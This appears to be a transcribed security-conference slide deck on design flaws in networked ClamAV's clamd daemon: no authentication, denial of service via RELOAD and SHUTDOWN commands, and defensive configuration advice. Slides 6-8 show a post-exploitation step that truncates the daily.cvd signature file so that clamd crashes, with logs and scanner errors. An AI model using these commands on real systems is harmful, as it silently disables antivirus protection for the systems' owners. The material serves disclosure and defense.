  • 1. Baking even more Clam(AV)s for Fun & Profit. ClamAV in a network accessible configuration provides not only remote virus scanning, but also the potential for DOS, etc.
  • 2. ClamAV-what it is. Open Source Software Provides Virus Scanning Currently owned by Sourcefire Cisco Systems
  • 3. ClamAV-Component Overview What it does. clamscan cmd line scanner Stand alone freshclam Signature DB update tool clamd Scanning Server Scanning clients clamdscan cmd line scanner clamav-milter email scanning plugin
  • 4. The Design Problems In Theory Configuration Clamd can bind to an IP address No Access Controls No Authentication No connection logging Malformed DB Handling
  • 5. The Implementation Problems In Practice Availability of Administrative Commands. VERSION Recon & Information disclosure RELOAD Default Virus DB size is about 74 MB Continuous reloads result in High CPU utilization. SHUTDOWN Guess what that does?:-) A DOS of a networked ClamAV installation. Discussed on ClamAV-user mailing list July 22-23 2011
  • 6. Bug 2727 Use in Post Exploitation clamconf|grep "DatabaseDirectory" DatabaseDirectory = "/usr/local/share/clamav" DatabaseDirectory = "/usr/local/share/clamav" cd /usr/local/share/clamav ls -lh *.cvd -rw-r--r-- 1 clamav clamav 66K Oct 19 01:08 bytecode.cvd -rw-r--r-- 1 clamav clamav 12M Nov 4 18:27 daily.cvd -rw-r--r-- 1 clamav clamav 62M Oct 19 01:07 main.cvd echo -n "" > daily.cvd ls -lh *.cvd -rw-r--r-- 1 clamav clamav 66K Oct 19 01:08 bytecode.cvd -rw-r--r-- 1 clamav clamav 0 Nov 4 18:41 daily.cvd -rw-r--r-- 1 clamav clamav 62M Oct 19 01:07 main.cvd
  • 7. Bug 2727 Use in Post Exploitation - Cont.d Nov Nov Nov Nov Nov Nov Nov Nov Nov 4 18:43:50 host clamd[24481]: Reading databases from /usr/local/share/clamav 4 18:43:50 host clamd[24481]: reload db failed: Broken or not a CVD file 4 18:43:50 host clamd[24481]: Terminating because of a fatal error. 4 18:43:50 host clamd[24481]: Waiting for all threads to finish 4 18:43:50 host clamd[24481]: Shutting down the main sockets. 4 18:43:50 host clamd[24481]: Pid file removed. 4 18:43:50 host clamd[24481]: --- Stopped at Mon Nov 4 18:43:50 2013 4 18:43:50 host clamd[24481]: Closing the main sockets. 4 18:43:50 host clamd[24481]: Socket file removed.
  • 8. Operational Impact clamdscan -m / ERROR: Can't connect to clamd: No such file or directory ----------- SCAN SUMMARY ----------Infected files: 0 Total errors: 1 Time: 0.000 sec (0 m 0 s)
  • 9. The Defense Configuration Bind to a LOCAL Socket Bind to loopback interface Access Controls - FIREWALL FIX THE BUGS! - Just Saying... :-) Monitoring
  • 10. Tools - Shameless Plugs Clambake Clambake 0.2 Enumeration "Stress" testing Networked ClamAV DOS capabilities.
  • 11. Tools - Continued bragging CCEE CCEE 0.97.4 Initially a patch for bug 1754 Adds connection logging to clamd for administrative commands Adds other functionallity to ClamAV Woefully Outdated I am NOT a real c coder. I DO have other things to do. :-)
  • 12. Tools - Continued Is he done yet? -- Almost. :-) clamd.monitor Monitor plugin for the mon framework Can be used as a stand alone solution Get them all and more at http://www.cmpublishers.com/oss
  • 13. Contact Info Email: nathan@cmpublishers.com Twitter: @Christ_Media Linkedin: http://www.linkedin.com/in/nategibbs Slideshare: http://www.slideshare.net/NathanGibbs3
  • 14. Thanks Jesus Christ BSides DE CLAMAV Dev Team, Sourcefire, & Cisco Folks on Clamav-users ML